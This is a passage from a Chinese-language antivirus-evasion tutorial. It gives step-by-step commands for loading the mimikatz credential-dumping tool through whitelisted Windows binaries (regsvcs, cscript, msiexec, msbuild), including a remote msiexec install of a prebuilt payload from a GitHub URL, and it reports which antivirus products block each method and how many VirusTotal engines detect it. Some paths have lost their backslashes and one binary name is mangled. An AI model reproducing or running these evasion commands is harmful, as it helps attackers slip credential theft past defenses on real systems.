再cmd执行
C:WindowsMicrosoft.NETFramework2.0.50727csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:WindowsMicrosoft.NETFramework2.0.50727 egsvcs.exe katz.exe运行时需要管理员权限,而且360会拦截
放行后可正常执行
virustotal.com上katz.exe查杀率为35/73,略惨。
方法12-JS加载mimikatz(VT查杀率22/59)
参考远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58):https://mp.weixin.qq.com/s/rm**AWC6HmcphozfEZhRGA
这个是大佬已经做好的payload,可以直接进行使用。
用DotNetToJScript实现
https://github.com/tyranid/DotNetToJScriptmimikatz
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.js执行cscript mimikatz.js,360会拦截。
放行后可正常执行
virustotal.com上mimikatz.js查杀率为22/59。
方法13-msiexec加载mimikatz(VT查杀率25/60)
参考远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60):https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg
使用Advanced Installer生成msi文件。
远程执行
msiexec.exe /passive /i https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.msi /norestart
本地执行
msiexec /passive /i Mimikatz.msi
virustotal.com上mimikatz.msi查杀率为25/60。
方法14-白名单msbuild.exe加载(VT查杀率4/59)
可参考之前的远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57):https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA
下载mimikatz.xml
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml执行
C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml火绒会预警,360不会
virustotal.com上executes-mimikatz.xml查杀率为4/59。